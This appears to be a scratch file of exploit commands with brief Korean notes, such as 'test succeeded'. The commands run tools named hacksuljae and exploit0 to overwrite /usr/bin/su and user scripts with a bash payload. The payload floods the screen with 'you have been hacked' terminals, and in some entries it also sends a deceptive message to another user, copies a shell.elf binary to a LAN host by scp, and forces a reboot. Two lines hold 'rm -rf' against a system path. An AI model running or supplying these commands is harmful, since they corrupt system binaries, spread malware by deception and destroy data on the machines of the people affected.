./hacksuljae-1 /usr/bin/su 1 $\n'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /usr/bin/su

./exploit0 /home/ahn/Desktop/test0.sh 1 $\n'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /home/ahn/Desktop/test0.sh
#!/bin/bash
rm -rf "시스템파일 경로"

./hacksuljae-1 /home/test/Desktop/test.bat 1 $'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /home/ahn/Desktop/test0.sh

./exploit0 /home/ahn/Desktop/test0.sh 1 $\n'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /home/ahn/Desktop/test0.sh
#!/bin/bash
rm -rf "시스템파일 경로"

./exploit0 /home/ahn/Desktop/test0.sh 1 $'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//'
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

./hacksuljae-1 /home/test/Desktop/test.bat 1 $'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /home/test/Desktop/test.bat

./hacksuljae-1 /usr/bin/su 1 $'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /usr/bin/su

./hacksuljae /home/user1/Desktop/b.sh 1 $'#!/bin/bash\naaa=\"Hi User2, I\'m User1 I send a file. That file is the executable file associated with our project. Please check this file in your Desktop\"\nwall $aaa;\nscp \"/home/user1/Downloads/my/hacksuljae.c\" \"user2@192.168.59.138:/home/user2/Desktop\"\n/home/user1/Downloads/my/3d375d0ead2b63168de86ca2649360d9dcff75b3e0ffa2cf1e50816ec92b3b7d.elf\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\nsleep 10\nreboot\n//'

./hacksuljae /home/user1/Desktop/b.sh 1 $'#!/bin/bash\naaa=\"Hi User2, I\'m User1 I send a file. That file is the executable file associated with our project. Please check this file in your Desktop\"\nwall $aaa;\nscp \"/home/user1/Downloads/shell.elf\" \"user2@192.168.59.139:/home/user2/Desktop\"\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\nsleep 10\nreboot\n//'

------------------------------------------------------
검수필요
./hacksuljae /usr/bin/su 1 $'#!/bin/bash\naaa=\"Hi User2, I\'m User1 I send a file. That file is the executable file associated with our project. Please check this file in your Desktop\"\nwall $aaa;\nscp \"/home/user1/Downloads/shell.elf\" \"user2@192.168.59.139:/home/user2/Desktop\"\nshutdown -r +1\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /usr/bin/su

-----------------------
test성공
./hacksuljae /usr/bin/su 1 $'#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /usr/bin/su

-----------------------
./hacksuljae /usr/bin/su 1 $'\n#!/bin/bash\naaa=\"Hi User2, I\'m User1 I send a file. That file is the executable file associated with our project. Please check this file in your Desktop\"\nwall $aaa;\nscp \"/home/user1/Downloads/shell.elf\" \"user2@192.168.59.139:/home/user2/Desktop\"\nshutdown -r +1\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /usr/bin/su

./hacksuljae /usr/bin/su 1 $'\n#!/bin/bash\nwhile true; do\ngnome-terminal -- bash -c \'echo \"you have been hacked!\"; read -p \"Press Enter to continue or \"\'\ndone\n//' && sed -i '1d' /usr/bin/su
